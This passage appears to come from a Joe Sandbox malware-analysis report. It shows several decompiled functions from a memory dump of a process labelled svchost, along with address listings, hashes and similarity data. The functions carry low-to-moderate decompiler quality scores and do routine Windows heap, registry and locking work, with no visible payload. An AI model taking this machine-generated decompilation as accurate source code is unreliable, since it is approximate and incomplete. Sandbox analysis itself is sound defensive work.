				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03069650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                        0x0302c608
                        0x0302c615
                        0x0302c625
                        0x0302c62d
                        0x0302c635
                        0x0302c640
                        0x0302c680
                        0x0302c687
                        0x0302c688
                        0x0302c689
                        0x0302c694
                        0x0302c694
                        0x0302c642
                        0x0302c64a
                        0x0302c697
                        0x03097a25
                        0x03097a2b
                        0x03097a2e
                        0x03097a30
                        0x03097bea
                        0x03097bea
                        0x00000000
                        0x03097bea
                        0x03097a36
                        0x03097a43
                        0x03097a48
                        0x03097a4c
                        0x03097a4e
                        0x00000000
                        0x00000000
                        0x03097a58
                        0x03097a5a
                        0x03097a5b
                        0x03097a5c
                        0x03097a5d
                        0x03097a63
                        0x03097a64
                        0x03097a6a
                        0x03097a6c
                        0x03097a6e
                        0x030979cb
                        0x030979cb
                        0x030979ce
                        0x030979d0
                        0x03097a98
                        0x03097a9b
                        0x03097a9b
                        0x03097a9e
                        0x03097aa1
                        0x03097bbe
                        0x03097bbe
                        0x03097bc0
                        0x03097be0
                        0x03097be0
                        0x03097a01
                        0x03097a01
                        0x03097a05
                        0x03097a07
                        0x03097a15
                        0x03097a15
                        0x03097a1a
                        0x00000000
                        0x03097a1a
                        0x03097bc2
                        0x03097bc6
                        0x03097bc9
                        0x03097bcd
                        0x03097bcf
                        0x030979e6
                        0x030979e6
                        0x030979eb
                        0x030979eb
                        0x030979ef
                        0x030979f1
                        0x00000000
                        0x00000000
                        0x030979f3
                        0x030979f5
                        0x030979ff
                        0x030979ff
                        0x00000000
                        0x030979ff
                        0x030979f7
                        0x030979fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030979fd
                        0x03097bd5
                        0x03097bd8
                        0x00000000
                        0x00000000
                        0x03097ba9
                        0x03097bac
                        0x03097bb0
                        0x03097bb1
                        0x03097bb1
                        0x03097bb6
                        0x00000000
                        0x03097bb6
                        0x03097aa7
                        0x03097aaa
                        0x00000000
                        0x00000000
                        0x03097ab2
                        0x03097ab3
                        0x03097ab5
                        0x03097aec
                        0x03097aef
                        0x03097b25
                        0x03097b28
                        0x03097b62
                        0x03097b64
                        0x03097b8f
                        0x03097b92
                        0x03097b96
                        0x03097b98
                        0x00000000
                        0x00000000
                        0x03097b9e
                        0x03097b9f
                        0x03097ba3
                        0x00000000
                        0x03097ba3
                        0x03097b66
                        0x03097b68
                        0x03097ae2
                        0x03097ae2
                        0x00000000
                        0x03097ae2
                        0x03097b6e
                        0x03097b72
                        0x03097b75
                        0x03097b81
                        0x03097b85
                        0x03097b87
                        0x00000000
                        0x00000000
                        0x03097b31
                        0x03097b34
                        0x03097b3c
                        0x03097b45
                        0x03097b46
                        0x03097b4f
                        0x03097b51
                        0x03097b57
                        0x03097b59
                        0x03097b59
                        0x00000000
                        0x03097b59
                        0x03097b77
                        0x00000000
                        0x03097b77
                        0x03097b2a
                        0x00000000
                        0x03097b2a
                        0x03097af1
                        0x03097af3
                        0x00000000
                        0x00000000
                        0x03097afb
                        0x03097afc
                        0x03097afe
                        0x00000000
                        0x00000000
                        0x03097b00
                        0x03097b03
                        0x00000000
                        0x00000000
                        0x03097b05
                        0x03097b09
                        0x03097b0d
                        0x03097b0f
                        0x00000000
                        0x00000000
                        0x03097b18
                        0x03097b1d
                        0x00000000
                        0x03097b1d
                        0x03097ab7
                        0x03097ab9
                        0x00000000
                        0x00000000
                        0x03097abf
                        0x03097ac1
                        0x00000000
                        0x00000000
                        0x03097ac3
                        0x03097ac6
                        0x00000000
                        0x00000000
                        0x03097ac8
                        0x03097acc
                        0x03097ad0
                        0x03097ad2
                        0x00000000
                        0x00000000
                        0x03097adb
                        0x00000000
                        0x03097adb
                        0x030979d6
                        0x030979d9
                        0x030979dc
                        0x03097a91
                        0x03097a94
                        0x00000000
                        0x03097a94
                        0x030979e2
                        0x00000000
                        0x030979e2
                        0x03097a74
                        0x03097a7a
                        0x00000000
                        0x00000000
                        0x03097a8a
                        0x03097a21
                        0x03097a21
                        0x00000000
                        0x03097a21
                        0x0302c650
                        0x0302c651
                        0x0302c656
                        0x0302c65c
                        0x0302c65d
                        0x0302c663
                        0x0302c664
                        0x0302c66a
                        0x0302c66e
                        0x030979c5
                        0x030979c7
                        0x00000000
                        0x030979c7
                        0x0302c67a
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 17237bcf4b7da7ac8845fd6f1fb3423b8fbae950077bfa87f59f03383991ba56
                        • Instruction ID: 94ba6b428ad90b34440d5190f6ad6796ca31b9718016a03252fe68d786b2b6ae
                        • Opcode Fuzzy Hash: 17237bcf4b7da7ac8845fd6f1fb3423b8fbae950077bfa87f59f03383991ba56
                        • Instruction Fuzzy Hash: B6819F766263019BEF65CE14C880B7FB3E8EF84A50F18496BED459B240D331DD40DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030BB8D0 Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E030BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3117b9c; // 0x0
				_t124 = L03044620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03069800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E030695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E030695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L030477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03069910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E030695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3117b9c; // 0x0
									_t92 = L03044620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03069910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0302A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E030BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E030BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E030695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                        0x030bb8d9
                        0x030bb8e4
                        0x00000000
                        0x030bb8e6
                        0x030bb8f3
                        0x030bb8f5
                        0x030bb8f5
                        0x030bb8f8
                        0x030bb920
                        0x030bb924
                        0x030bb936
                        0x030bb939
                        0x030bb93d
                        0x030bb948
                        0x030bb9a0
                        0x030bb9a0
                        0x030bb9a4
                        0x030bb9bf
                        0x030bb9c4
                        0x030bb9c6
                        0x030bb9cd
                        0x030bb9d1
                        0x030bbad4
                        0x030bbad8
                        0x030bbada
                        0x030bbadc
                        0x030bbadc
                        0x030bbadf
                        0x030bbae0
                        0x030bbae2
                        0x030bbae4
                        0x030bbaec
                        0x030bbaee
                        0x030bbaf0
                        0x030bbaf0
                        0x030bbaec
                        0x030bbafb
                        0x030bbafc
                        0x030bbafe
                        0x030bbb01
                        0x030bbb01
                        0x00000000
                        0x030bbb06
                        0x030bb9d7
                        0x030bb9db
                        0x030bb9db
                        0x030bb9de
                        0x030bb9de
                        0x030bb9e4
                        0x030bb9e7
                        0x030bb9ea
                        0x030bb9ec
                        0x030bb9ef
                        0x030bb9f3
                        0x030bba1b
                        0x030bba1b
                        0x030bba23
                        0x030bba24
                        0x030bba27
                        0x030bba2a
                        0x030bba2b
                        0x030bba2e
                        0x030bba30
                        0x030bba37
                        0x030bba3f
                        0x030bba9c
                        0x030bbaa2
                        0x030bbb13
                        0x030bbb15
                        0x030bbaae
                        0x030bbaae
                        0x030bbab3
                        0x030bbab5
                        0x030bbaba
                        0x030bbac8
                        0x030bbac8
                        0x030bbaba
                        0x030bbacd
                        0x030bbacf
                        0x00000000
                        0x030bbacf
                        0x030bbb1a
                        0x00000000
                        0x030bbb1c
                        0x030bbaa7
                        0x030bbb11
                        0x00000000
                        0x030bbb11
                        0x030bbaa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030bba41
                        0x030bba41
                        0x030bba41
                        0x030bba58
                        0x030bba5d
                        0x030bba62
                        0x00000000
                        0x00000000
                        0x030bba64
                        0x030bba67
                        0x030bba68
                        0x030bba69
                        0x030bba6c
                        0x030bba6f
                        0x030bba71
                        0x030bba78
                        0x030bba80
                        0x00000000
                        0x00000000
                        0x030bba90
                        0x030bba90
                        0x030bba97
                        0x00000000
                        0x030bba97
                        0x030bb9f5
                        0x030bb9f7
                        0x030bb9f7
                        0x030bb9fa
                        0x030bba03
                        0x030bba07
                        0x030bba0c
                        0x030bba10
                        0x030bba17
                        0x00000000
                        0x030bb9f7
                        0x030bb9a6
                        0x030bb9a8
                        0x030bb9af
                        0x030bb9b3
                        0x00000000
                        0x00000000
                        0x030bb9b9
                        0x00000000
                        0x030bb9b9
                        0x030bb94d
                        0x030bb98f
                        0x030bb995
                        0x030bb999
                        0x030bb960
                        0x030bb967
                        0x030bb968
                        0x030bb96a
                        0x00000000
                        0x030bb96a
                        0x030bb99b
                        0x030bb99e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030bb99e
                        0x030bb951
                        0x030bb954
                        0x030bb95a
                        0x030bb95e
                        0x030bb972
                        0x030bb979
                        0x030bb97d
                        0x030bb97f
                        0x030bb980
                        0x030bb982
                        0x030bb984
                        0x00000000
                        0x030bb984
                        0x00000000
                        0x030bb926
                        0x00000000
                        0x030bb926

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f76e6f76a9619f5cde3aaa0cd40e744a888d8fdff61cb04b5bc79e5a0551440
                        • Instruction ID: 564bc184c294201cdd4aff97e9be4bfa34b6ea76151bb44f312ff128ba1b417f
                        • Opcode Fuzzy Hash: 0f76e6f76a9619f5cde3aaa0cd40e744a888d8fdff61cb04b5bc79e5a0551440
                        • Instruction Fuzzy Hash: 3471FF76602701EFD721DF18C944FEABBF5EF84720F184928E6558B6A0DBB1E940CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A6DC9 Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E030A6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E030A6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03047D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03069AE0();
					_t87 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E030A795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E030A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E030A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E030A795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03044620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E030A6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E030A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E030A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E030A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03047D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03069AE0();
								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03042400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03042400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03042400( &_v52);
							}
							if(_v28 >= 0) {
								return L03042400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                        0x030a6dd4
                        0x030a6dde
                        0x030a6de1
                        0x030a6de3
                        0x030a6de6
                        0x030a6de9
                        0x030a6dec
                        0x030a6def
                        0x030a6df2
                        0x030a6df5
                        0x030a6dfe
                        0x030a6e04
                        0x030a6e09
                        0x030a6e0d
                        0x030a6e18
                        0x030a6e1b
                        0x030a6e22
                        0x030a6e2d
                        0x030a6e30
                        0x030a6e36
                        0x030a6e42
                        0x030a6e4d
                        0x030a6e50
                        0x030a6e55
                        0x030a6e5c
                        0x030a6e6e
                        0x030a6e5e
                        0x030a6e67
                        0x030a6e67
                        0x030a6e73
                        0x030a6e74
                        0x030a6e77
                        0x030a6e7c
                        0x030a6e7d
                        0x030a6e8e
                        0x030a6e93
                        0x030a6e9c
                        0x030a6ea8
                        0x030a6eab
                        0x030a6eac
                        0x030a6eb3
                        0x030a6ecd
                        0x030a6edc
                        0x030a6ee2
                        0x030a6ee5
                        0x030a6ef2
                        0x030a6efb
                        0x030a6f01
                        0x030a6f06
                        0x030a6f0b
                        0x030a6f11
                        0x030a6f1a
                        0x030a6f22
                        0x030a6f26
                        0x030a6f26
                        0x030a6f33
                        0x030a6f41
                        0x030a6f44
                        0x030a6f47
                        0x030a6f54
                        0x030a6f65
                        0x030a6f77
                        0x030a6f7c
                        0x030a6f82
                        0x030a6f91
                        0x030a6f99
                        0x030a6fa3
                        0x030a6fae
                        0x030a6fae
                        0x030a6fba
                        0x030a6fbb
                        0x030a6fbc
                        0x030a6fc1
                        0x030a6fc2
                        0x030a6fd3
                        0x030a6fd8
                        0x030a6fd8
                        0x030a6fdf
                        0x030a6fe8
                        0x030a6fee
                        0x030a6fee
                        0x030a6ff5
                        0x030a6ffb
                        0x030a6ffb
                        0x030a7004
                        0x00000000
                        0x030a700a
                        0x030a7004
                        0x030a6eb3
                        0x030a6e9c
                        0x030a7015

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: a87d5896fd699db4a9e9fea92b6495a9af1ddcb0d9facc3c76976b99412911a3
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 4F717A75A01609EFCB11DFA9D984EEEBBF9FF88704F144469E505AB250DB30EA41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030252A5 Relevance: .2, Instructions: 161COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E030252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0303EEF0(0x31179a0);
					_t104 =  *0x3118210; // 0x2803628
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0303EB70(_t93, 0x31179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03069890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0303EEF0(0x31179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0303EB70(0, 0x31179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2803635
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0305F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0303EEF0(0x31179a0);
									__eflags =  *0x3118210 - _t104; // 0x2803628
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3118210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E030A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0303EB70(_t95, 0x31179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E030695D0();
											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E030695D0();
											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0303EB70(_t93, 0x31179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E030695D0();
										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E030695D0();
										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0305F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                        0x030252a5
                        0x030252ad
                        0x030252b0
                        0x030252b3
                        0x030252b7
                        0x030252ba
                        0x030252bf
                        0x030252c4
                        0x030252cc
                        0x00000000
                        0x00000000
                        0x030252ce
                        0x030252d9
                        0x030252dd
                        0x030252e7
                        0x030252f7
                        0x030252f9
                        0x030252fd
                        0x03080dcf
                        0x03080dd5
                        0x03080dd6
                        0x03080dd7
                        0x03080dd8
                        0x03080dd9
                        0x03080dde
                        0x03080ddf
                        0x03080de0
                        0x03080de1
                        0x03080de2
                        0x03080de5
                        0x03080dea
                        0x03080dec
                        0x03080f60
                        0x03080f64
                        0x03080f70
                        0x03080f76
                        0x03080f79
                        0x03080f79
                        0x00000000
                        0x03080f64
                        0x03080df2
                        0x03080df7
                        0x03080e04
                        0x03080e0d
                        0x03080e0d
                        0x03080e10
                        0x03080e1a
                        0x03080e1c
                        0x03080e4c
                        0x03080e52
                        0x03080e61
                        0x03080e67
                        0x03080e6b
                        0x03080e70
                        0x03080e76
                        0x03080ed7
                        0x03080edc
                        0x03080ee0
                        0x03080ee6
                        0x03080eea
                        0x03080eed
                        0x03080ef0
                        0x03080ef3
                        0x03080ef6
                        0x03080ef9
                        0x03080efe
                        0x03080f01
                        0x03080f01
                        0x03080f0b
                        0x03080f12
                        0x03080f16
                        0x03080f18
                        0x03080f1b
                        0x03080f2c
                        0x03080f31
                        0x03080f31
                        0x03080f35
                        0x03080f39
                        0x03080f3a
                        0x03080f3c
                        0x03080f3f
                        0x03080f50
                        0x03080f55
                        0x03080f55
                        0x03080f59
                        0x030252eb
                        0x030252f1
                        0x030252f1
                        0x03080e7d
                        0x03080e84
                        0x03080e88
                        0x03080e8a
                        0x03080e8d
                        0x03080e9e
                        0x03080ea3
                        0x03080ea3
                        0x03080ea7
                        0x03080eaf
                        0x03080eb3
                        0x03080eb9
                        0x03080eb9
                        0x03080ebc
                        0x03080ecd
                        0x03080ecd
                        0x00000000
                        0x03080eb3
                        0x03080e21
                        0x03080e2b
                        0x03080e2f
                        0x03080e30
                        0x03080e3a
                        0x03080e3f
                        0x03080e41
                        0x00000000
                        0x00000000
                        0x03080e47
                        0x00000000
                        0x03080e47
                        0x03080df9
                        0x03080dfe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03080dfe
                        0x03025303
                        0x03025307
                        0x00000000
                        0x03025309
                        0x00000000
                        0x03025309
                        0x03025307
                        0x030252e9
                        0x030252e9
                        0x00000000
                        0x030252e9
                        0x0302530e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
